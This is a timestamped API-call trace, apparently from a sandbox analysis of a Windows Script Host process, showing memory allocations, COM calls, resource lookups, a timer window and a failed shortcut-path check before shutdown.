	[0112.634] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0112.635] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0112.635] IUnknown:Release (This=0x25f420) returned 0x1
	[0112.635] GetTickCount () returned 0x2c937
	[0112.635] ??2@YAPEAX_K@Z () returned 0x455d50
	[0112.636] ??2@YAPEAX_K@Z () returned 0x455d50
	[0112.637] ??2@YAPEAX_K@Z () returned 0x455d80
	[0112.637] ??2@YAPEAX_K@Z () returned 0x455db0
	[0112.638] ??2@YAPEAX_K@Z () returned 0x455db0
	[0112.639] ??2@YAPEAX_K@Z () returned 0x455de0
	[0112.640] ??2@YAPEAX_K@Z () returned 0x455e10
	[0112.640] ??2@YAPEAX_K@Z () returned 0x455e10
	[0112.641] ??2@YAPEAX_K@Z () returned 0x455e40
	[0112.642] ??2@YAPEAX_K@Z () returned 0x455e70
	[0112.642] ??2@YAPEAX_K@Z () returned 0x455e70
	[0112.643] ??2@YAPEAX_K@Z () returned 0x455ea0
	[0112.644] ??2@YAPEAX_K@Z () returned 0x447a90
	[0112.645] ??2@YAPEAX_K@Z () returned 0x447a90
	[0112.645] ??2@YAPEAX_K@Z () returned 0x447ac0
	[0112.646] ??2@YAPEAX_K@Z () returned 0x447af0
	[0112.647] ??2@YAPEAX_K@Z () returned 0x447af0
	[0112.647] ??2@YAPEAX_K@Z () returned 0x447b20
	[0112.648] ??2@YAPEAX_K@Z () returned 0x447b50
	[0112.649] ??2@YAPEAX_K@Z () returned 0x447b50
	[0112.649] ??2@YAPEAX_K@Z () returned 0x447b80
	[0112.650] ??2@YAPEAX_K@Z () returned 0x447bb0
	[0112.651] ??2@YAPEAX_K@Z () returned 0x447bb0
	[0112.652] ??2@YAPEAX_K@Z () returned 0x447be0
	[0112.652] ??2@YAPEAX_K@Z () returned 0x447c10
	[0112.653] ??2@YAPEAX_K@Z () returned 0x447c10
	[0112.654] ??2@YAPEAX_K@Z () returned 0x447c40
	[0112.654] ??2@YAPEAX_K@Z () returned 0x447c70
	[0112.655] ??2@YAPEAX_K@Z () returned 0x447c70
	[0112.656] ??2@YAPEAX_K@Z () returned 0x447ca0
	[0112.657] ??2@YAPEAX_K@Z () returned 0x447cd0
	[0112.658] ??2@YAPEAX_K@Z () returned 0x447cd0
	[0112.658] ??2@YAPEAX_K@Z () returned 0x447d00
	[0112.659] ??2@YAPEAX_K@Z () returned 0x447d30
	[0112.660] ??2@YAPEAX_K@Z () returned 0x447d30
	[0112.660] ??2@YAPEAX_K@Z () returned 0x447d60
	[0112.661] ??2@YAPEAX_K@Z () returned 0x447d90
	[0112.662] ??2@YAPEAX_K@Z () returned 0x447d90
	[0112.663] ??2@YAPEAX_K@Z () returned 0x447dc0
	[0112.663] ??2@YAPEAX_K@Z () returned 0x447df0
	[0112.664] ??2@YAPEAX_K@Z () returned 0x447df0
	[0112.665] ??2@YAPEAX_K@Z () returned 0x447e20
	[0112.665] ??2@YAPEAX_K@Z () returned 0x447e50
	[0112.666] ??2@YAPEAX_K@Z () returned 0x447e50
	[0112.667] ??2@YAPEAX_K@Z () returned 0x447e80
	[0112.668] ??2@YAPEAX_K@Z () returned 0x447eb0
	[0112.668] ??2@YAPEAX_K@Z () returned 0x447eb0
	[0112.669] ??2@YAPEAX_K@Z () returned 0x447ee0
	[0112.670] ??2@YAPEAX_K@Z () returned 0x447f10
	[0112.670] ??2@YAPEAX_K@Z () returned 0x447f10
	[0112.671] ??2@YAPEAX_K@Z () returned 0x447f40
	[0113.184] ??2@YAPEAX_K@Z () returned 0x447f70
	[0113.185] ??2@YAPEAX_K@Z () returned 0x447f70
	[0113.186] ??2@YAPEAX_K@Z () returned 0x447fa0
	[0113.187] ??2@YAPEAX_K@Z () returned 0x447fd0
	[0113.187] ??2@YAPEAX_K@Z () returned 0x447fd0
	[0113.188] ??2@YAPEAX_K@Z () returned 0x448000
	[0113.189] ??2@YAPEAX_K@Z () returned 0x448030
	[0113.189] ??2@YAPEAX_K@Z () returned 0x448030
	[0113.190] ??2@YAPEAX_K@Z () returned 0x448060
	[0114.132] ??2@YAPEAX_K@Z () returned 0x453840
	[0114.134] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.137] realloc (_Block=0x0, _Size=0x64) returned 0x482700
	[0114.137] realloc (_Block=0x0, _Size=0xc8) returned 0x444520
	[0114.482] free (_Block=0x482700) 
	[0114.483] ??2@YAPEAX_K@Z () returned 0x459b10
	[0114.488] ??2@YAPEAX_K@Z () returned 0x45a760
	[0114.490] ??2@YAPEAX_K@Z () returned 0x482700
	[0114.492] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0114.492] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.492] GetTickCount () returned 0x2d077
	[0114.496] malloc (_Size=0x208) returned 0x482cf0
	[0114.497] ??2@YAPEAX_K@Z () returned 0x4547e0
	[0114.499] ??2@YAPEAX_K@Z () returned 0x480a20
	[0114.503] ??2@YAPEAX_K@Z () returned 0x45aa00
	[0114.505] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.507] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0114.507] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.507] GetTickCount () returned 0x2d087
	[0114.508] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0114.508] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.508] GetTickCount () returned 0x2d087
	[0114.509] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0114.509] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.509] GetTickCount () returned 0x2d087
	[0114.668] ??2@YAPEAX_K@Z () returned 0x452e00
	[0114.670] ??2@YAPEAX_K@Z () returned 0x480a20
	[0114.673] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0114.673] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.673] GetTickCount () returned 0x2d133
	[0114.675] ??2@YAPEAX_K@Z () returned 0x445590
	[0114.678] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.680] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0114.680] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.680] GetTickCount () returned 0x2d133
	[0114.681] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0114.681] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.681] GetTickCount () returned 0x2d133
	[0114.683] ??2@YAPEAX_K@Z () returned 0x446fa0
	[0114.685] ??2@YAPEAX_K@Z () returned 0x480a20
	[0114.688] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0114.688] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.688] GetTickCount () returned 0x2d142
	[0114.690] ??2@YAPEAX_K@Z () returned 0x454ba0
	[0114.692] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.696] ??2@YAPEAX_K@Z () returned 0x45a910
	[0114.698] ??2@YAPEAX_K@Z () returned 0x482700
	[0114.700] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0114.700] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.700] GetTickCount () returned 0x2d152
	[0114.702] malloc (_Size=0x408) returned 0x462c90
	[0114.702] realloc (_Block=0x0, _Size=0xa0) returned 0x442ad0
	[0114.703] ??2@YAPEAX_K@Z () returned 0x45aa90
	[0114.705] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.707] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0114.707] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.707] GetTickCount () returned 0x2d152
	[0114.710] ??2@YAPEAX_K@Z () returned 0x44c0c0
	[0114.712] ??2@YAPEAX_K@Z () returned 0x480a20
	[0114.714] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0114.809] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.809] GetTickCount () returned 0x2d1bf
	[0114.811] ??2@YAPEAX_K@Z () returned 0x44b950
	[0114.813] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.817] ??2@YAPEAX_K@Z () returned 0x4530d0
	[0114.819] ??2@YAPEAX_K@Z () returned 0x482700
	[0114.822] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0114.822] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.822] GetTickCount () returned 0x2d1bf
	[0114.824] ??2@YAPEAX_K@Z () returned 0x454900
	[0114.826] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.830] ??2@YAPEAX_K@Z () returned 0x44bb30
	[0114.831] GetVersionExA (in: lpVersionInformation=0x15c8a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x4212f0, dwBuildNumber=0x0, dwPlatformId=0x25e198, szCSDVersion="") | out: lpVersionInformation=0x15c8a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0114.831] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x2207f8
	[0114.832] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207f8) returned 0x221d44
	[0114.832] LockResource (hResData=0x221d44) returned 0x221d44
	[0114.832] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207f8) returned 0x15c
	[0114.832] FreeResource (hResData=0x221d44) returned 0
	[0114.832] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x2207e8
	[0114.832] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0x221c74
	[0114.832] LockResource (hResData=0x221c74) returned 0x221c74
	[0114.832] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0xce
	[0114.833] FreeResource (hResData=0x221c74) returned 0
	[0114.833] bsearch (_Key=0x15d238, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0114.833] ??2@YAPEAX_K@Z () returned 0x480a20
	[0114.836] ??2@YAPEAX_K@Z () returned 0x463120
	[0114.838] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0114.838] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.838] GetTickCount () returned 0x2d1cf
	[0114.843] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0114.847] ??2@YAPEAX_K@Z () returned 0x44cb30
	[0114.849] ??2@YAPEAX_K@Z () returned 0x482700
	[0114.852] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0114.852] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.852] GetTickCount () returned 0x2d1de
	[0114.853] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0114.854] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.854] GetTickCount () returned 0x2d1de
	[0114.854] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0114.854] IUnknown:Release (This=0x25f420) returned 0x1
	[0114.854] GetTickCount () returned 0x2d27a
	[0115.002] ??2@YAPEAX_K@Z () returned 0x465ee0
	[0115.004] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.008] ??2@YAPEAX_K@Z () returned 0x4c3c00
	[0115.010] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.010] GetTickCount () returned 0x2d27a
	[0115.010] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.014] realloc (_Block=0x442ad0, _Size=0x140) returned 0x455720
	[0115.015] ??2@YAPEAX_K@Z () returned 0x44be60
	[0115.017] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.017] GetTickCount () returned 0x2d28a
	[0115.017] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.021] ??2@YAPEAX_K@Z () returned 0x46c0c0
	[0115.023] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.024] GetTickCount () returned 0x2d28a
	[0115.024] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.024] free (_Block=0x494410) 
	[0115.024] free (_Block=0x444f90) 
	[0115.024] free (_Block=0x468730) 
	[0115.024] free (_Block=0x493000) 
	[0115.024] free (_Block=0x483000) 
	[0115.024] free (_Block=0x45acc0) 
	[0115.024] free (_Block=0x44e9e0) 
	[0115.024] ??3@YAXPEAX@Z () returned 0x57760f01
	[0115.024] ??3@YAXPEAX@Z () returned 0x57760f01
	[0115.028] ??2@YAPEAX_K@Z () returned 0x46c300
	[0115.030] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.034] ??2@YAPEAX_K@Z () returned 0x464580
	[0115.036] ??2@YAPEAX_K@Z () returned 0x482700
	[0115.036] GetTickCount () returned 0x2d299
	[0115.037] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.037] free (_Block=0x494410) 
	[0115.037] free (_Block=0x444f90) 
	[0115.037] free (_Block=0x468730) 
	[0115.037] free (_Block=0x493000) 
	[0115.037] free (_Block=0x483000) 
	[0115.037] free (_Block=0x45acc0) 
	[0115.037] free (_Block=0x44e9e0) 
	[0115.037] ??3@YAXPEAX@Z () returned 0x57760f01
	[0115.037] ??3@YAXPEAX@Z () returned 0x57760f01
	[0115.040] malloc (_Size=0x808) returned 0x465f20
	[0115.041] ??2@YAPEAX_K@Z () returned 0x464850
	[0115.252] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.256] ??2@YAPEAX_K@Z () returned 0x46c7e0
	[0115.258] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.263] ??2@YAPEAX_K@Z () returned 0x46afd0
	[0115.265] ??2@YAPEAX_K@Z () returned 0x44e0a0
	[0115.265] GetTickCount () returned 0x2d383
	[0115.265] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.269] ??2@YAPEAX_K@Z () returned 0x4c30f0
	[0115.271] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.275] ??2@YAPEAX_K@Z () returned 0x4c3930
	[0115.277] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.281] ??2@YAPEAX_K@Z () returned 0x46c8a0
	[0115.283] ??2@YAPEAX_K@Z () returned 0x44e120
	[0115.283] GetTickCount () returned 0x2d393
	[0115.283] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.284] free (_Block=0x494410) 
	[0115.284] free (_Block=0x444f90) 
	[0115.284] free (_Block=0x468730) 
	[0115.284] free (_Block=0x493000) 
	[0115.284] free (_Block=0x483000) 
	[0115.284] free (_Block=0x45acc0) 
	[0115.284] free (_Block=0x44e9e0) 
	[0115.284] ??3@YAXPEAX@Z () returned 0x57760f01
	[0115.284] ??3@YAXPEAX@Z () returned 0x57760f01
	[0115.288] ??2@YAPEAX_K@Z () returned 0x44bef0
	[0115.290] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.290] GetTickCount () returned 0x2d393
	[0115.290] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0115.513] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0115.513] IUnknown:Release (This=0x25f420) returned 0x1
	[0115.513] GetTickCount () returned 0x2d47d
	[0115.516] ??2@YAPEAX_K@Z () returned 0x4c9f00
	[0115.518] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.523] ??2@YAPEAX_K@Z () returned 0x4ca5c0
	[0115.525] ??2@YAPEAX_K@Z () returned 0x482700
	[0115.528] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0115.528] IUnknown:Release (This=0x25f420) returned 0x1
	[0115.528] GetTickCount () returned 0x2d48d
	[0115.530] ??2@YAPEAX_K@Z () returned 0x4d2e30
	[0115.532] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.538] ??2@YAPEAX_K@Z () returned 0x4d3a30
	[0115.540] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.545] ??2@YAPEAX_K@Z () returned 0x44e0a0
	[0115.547] ??2@YAPEAX_K@Z () returned 0x44e110
	[0115.553] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0115.778] ??2@YAPEAX_K@Z () returned 0x463120
	[0115.782] ??2@YAPEAX_K@Z () returned 0x482700
	[0115.782] ??2@YAPEAX_K@Z () returned 0x442d90
	[0115.782] malloc (_Size=0x80) returned 0x466910
	[0115.782] malloc (_Size=0x108) returned 0x429160
	[0115.784] ??2@YAPEAX_K@Z () returned 0x4531b0
	[0115.791] ??2@YAPEAX_K@Z () returned 0x444f90
	[0115.794] realloc (_Block=0x455720, _Size=0x280) returned 0x44f6b0
	[0115.797] ??2@YAPEAX_K@Z () returned 0x46ad10
	[0115.801] ??2@YAPEAX_K@Z () returned 0x4d1100
	[0115.801] malloc (_Size=0x18) returned 0x481530
	[0115.801] GetTickCount () returned 0x2d596
	[0116.119] MulDiv (nNumber=936, nNumerator=100, nDenominator=3336) returned 28
	[0116.119] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.119] GetTickCount () returned 0x2d6dd
	[0116.123] MulDiv (nNumber=983, nNumerator=100, nDenominator=3429) returned 29
	[0116.123] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.123] GetTickCount () returned 0x2d6dd
	[0116.127] MulDiv (nNumber=1009, nNumerator=100, nDenominator=3497) returned 29
	[0116.127] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.127] GetTickCount () returned 0x2d6dd
	[0116.130] MulDiv (nNumber=909, nNumerator=100, nDenominator=3518) returned 26
	[0116.130] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.130] GetTickCount () returned 0x2d6dd
	[0116.133] MulDiv (nNumber=1076, nNumerator=100, nDenominator=3572) returned 30
	[0116.134] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.134] GetTickCount () returned 0x2d6dd
	[0116.137] MulDiv (nNumber=970, nNumerator=100, nDenominator=3548) returned 27
	[0116.137] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.137] GetTickCount () returned 0x2d6ed
	[0116.141] MulDiv (nNumber=985, nNumerator=100, nDenominator=3605) returned 27
	[0116.141] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.141] GetTickCount () returned 0x2d6ed
	[0116.144] MulDiv (nNumber=939, nNumerator=100, nDenominator=3675) returned 26
	[0116.144] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.144] GetTickCount () returned 0x2d6ed
	[0116.149] MulDiv (nNumber=1021, nNumerator=100, nDenominator=3744) returned 27
	[0116.149] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.149] GetTickCount () returned 0x2d6ed
	[0116.325] MulDiv (nNumber=1108, nNumerator=100, nDenominator=3689) returned 30
	[0116.325] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.325] GetTickCount () returned 0x2d7a8
	[0116.329] MulDiv (nNumber=1021, nNumerator=100, nDenominator=3602) returned 28
	[0116.329] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.329] GetTickCount () returned 0x2d7a8
	[0116.336] MulDiv (nNumber=1021, nNumerator=100, nDenominator=3648) returned 28
	[0116.336] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.336] GetTickCount () returned 0x2d7a8
	[0116.349] MulDiv (nNumber=944, nNumerator=100, nDenominator=3676) returned 26
	[0116.349] IUnknown:Release (This=0x25f420) returned 0x1
	[0116.349] GetTickCount () returned 0x2d7b8
	[0116.356] _resetstkoflw () returned 0x1
	[0116.356] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x220718
	[0116.356] LoadResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x220b6c
	[0116.356] LockResource (hResData=0x220b6c) returned 0x220b6c
	[0116.356] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x86
	[0116.357] FreeResource (hResData=0x220b6c) returned 0
	[0116.357] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x2207e8
	[0116.357] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0x221c74
	[0116.357] LockResource (hResData=0x221c74) returned 0x221c74
	[0116.357] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0xce
	[0116.358] FreeResource (hResData=0x221c74) returned 0
	[0116.358] bsearch (_Key=0x733f8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0116.358] ??2@YAPEAX_K@Z () returned 0x4e9870
	[0117.862] MulDiv (nNumber=1285, nNumerator=100, nDenominator=3798) returned 34
	[0117.862] IUnknown:Release (This=0x25f420) returned 0x1
	[0117.862] GetTickCount () returned 0x2dda1
	[0117.866] CreateErrorInfo (in: pperrinfo=0x15c0d0 | out: pperrinfo=0x15c0d0*=0x28a5f8) returned 0x0
	[0117.867] CErrorObject::SetGUID () returned 0x0
	[0117.867] CErrorObject::SetSource () returned 0x0
	[0117.867] LoadStringW (in: hInstance=0x7fee1590000, uID=0x1004, lpBuffer=0x15a810, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0117.868] FormatMessageW (in: dwFlags=0x500, lpSource=0x28e5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x15c0e0, nSize=0x0, Arguments=0x15c150 | out: lpBuffer="\xb490\x2d") returned 0x31
	[0117.868] CErrorObject::SetDescription () returned 0x0
	[0117.868] CErrorObject::SetHelpFile () returned 0x0
	[0117.868] CErrorObject::SetHelpContext () returned 0x0
	[0117.868] QueryInterface () returned 0x0
	[0117.868] SetErrorInfo (dwReserved=0x0, perrinfo=0x28a5f0) returned 0x0
	[0117.868] Release () returned 0x2
	[0117.868] IUnknown:Release (This=0x28a5f0) returned 0x1
	[0117.868] LocalFree (hMem=0x2db490) returned 0x0
	[0117.869] IUnknown:Release (This=0x2da200) returned 0x1
	[0117.870] SetItemAlloc () returned 0x0
	[0117.870] Release () returned 0x1
	[0117.870] QueryInterface () returned 0x80004002
	[0117.870] QueryInterface () returned 0x80004002
	[0117.870] QueryInterface () returned 0x80004002
	[0117.870] QueryInterface () returned 0x80004002
	[0117.870] QueryInterface () returned 0x0
	[0117.870] Release () returned 0x1
	[0117.870] realloc (_Block=0x482b40, _Size=0x140) returned 0x441f40
	[0117.872] MulDiv (nNumber=929, nNumerator=100, nDenominator=3493) returned 27
	[0117.873] IUnknown:Release (This=0x25f420) returned 0x1
	[0117.873] GetTickCount () returned 0x2ddb1
	[0117.876] MulDiv (nNumber=943, nNumerator=100, nDenominator=3630) returned 26
	[0117.876] IUnknown:Release (This=0x25f420) returned 0x1
	[0117.876] GetTickCount () returned 0x2ddb1
	[0117.878] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x220718
	[0117.878] LoadResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x220b6c
	[0117.878] LockResource (hResData=0x220b6c) returned 0x220b6c
	[0117.878] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x220718) returned 0x86
	[0117.878] FreeResource (hResData=0x220b6c) returned 0
	[0117.879] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x2207e8
	[0117.879] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0x221c74
	[0117.879] LockResource (hResData=0x221c74) returned 0x221c74
	[0117.879] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0xce
	[0117.880] FreeResource (hResData=0x221c74) returned 0
	[0117.880] bsearch (_Key=0x733f8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0119.680] PostMessageA (hWnd=0x30240, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0119.681] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x15fa70*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0119.681] CloseHandle (hObject=0xd4) returned 1
	[0119.681] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.681] IUnknown:Release (This=0x26e5f0) returned 0x0
	[0119.681] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.681] IUnknown:Release (This=0x26e6a0) returned 0x0
	[0119.681] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.681] IUnknown:Release (This=0x26e750) returned 0x0
	[0119.682] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.682] IUnknown:Release (This=0x26e540) returned 0x0
	[0119.683] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.684] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.684] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.684] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.684] GetProcessHeap () returned 0x240000
	[0119.684] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2aae20 | out: hHeap=0x240000) returned 1
	[0119.685] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.685] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x15faa0 | out: lplpMessageFilter=0x15faa0*=0x425f80) returned 0x0
	[0119.685] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.685] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.685] ??3@YAXPEAX@Z () returned 0x57760f01
	[0119.685] CoUninitialize () 
	[0119.685] DllCanUnloadNow () returned 0x0
	[0119.685] DllCanUnloadNow () 

Thread:
	id = 268
	os_tid = 0x7f0


Thread:
	id = 269
	os_tid = 0x774

	[0103.916] GetClassInfoA (in: hInstance=0xffa90000, lpClassName="WSH-Timer", lpWndClass=0x26cf7f0 | out: lpWndClass=0x26cf7f0) returned 0
	[0103.916] RegisterClassA (lpWndClass=0x26cf7f0) returned 0x9006ac138
	[0103.916] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xffa90000, lpParam=0x425a60) returned 0x30240
	[0103.917] GetWindowLongPtrA (hWnd=0x30240, nIndex=-21) returned 0x0
	[0103.917] NtdllDefWindowProc_A (hWnd=0x30240, Msg=0x24, wParam=0x0, lParam=0x26cf1e0) returned 0x0
	[0103.917] GetWindowLongPtrA (hWnd=0x30240, nIndex=-21) returned 0x0
	[0103.917] SetWindowLongPtrA (hWnd=0x30240, nIndex=-21, dwNewLong=0x425a60) returned 0x0
	[0103.917] NtdllDefWindowProc_A (hWnd=0x30240, Msg=0x81, wParam=0x0, lParam=0x26cf1a0) returned 0x1
	[0103.918] GetWindowLongPtrA (hWnd=0x30240, nIndex=-21) returned 0x425a60
	[0103.918] NtdllDefWindowProc_A (hWnd=0x30240, Msg=0x83, wParam=0x0, lParam=0x26cf200) returned 0x0
	[0103.927] GetWindowLongPtrA (hWnd=0x30240, nIndex=-21) returned 0x425a60
	[0103.927] NtdllDefWindowProc_A (hWnd=0x30240, Msg=0x1, wParam=0x0, lParam=0x26cf1a0) returned 0x0
	[0103.927] SetEvent (hEvent=0xcc) returned 1
	[0103.962] GetMessageA (in: lpMsg=0x26cf7c0, hWnd=0x30240, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x26cf7c0) returned 0
	[0119.677] GetWindowLongPtrA (hWnd=0x30240, nIndex=-21) returned 0x425a60
	[0119.678] GetWindowLongPtrA (hWnd=0x30240, nIndex=-21) returned 0x425a60
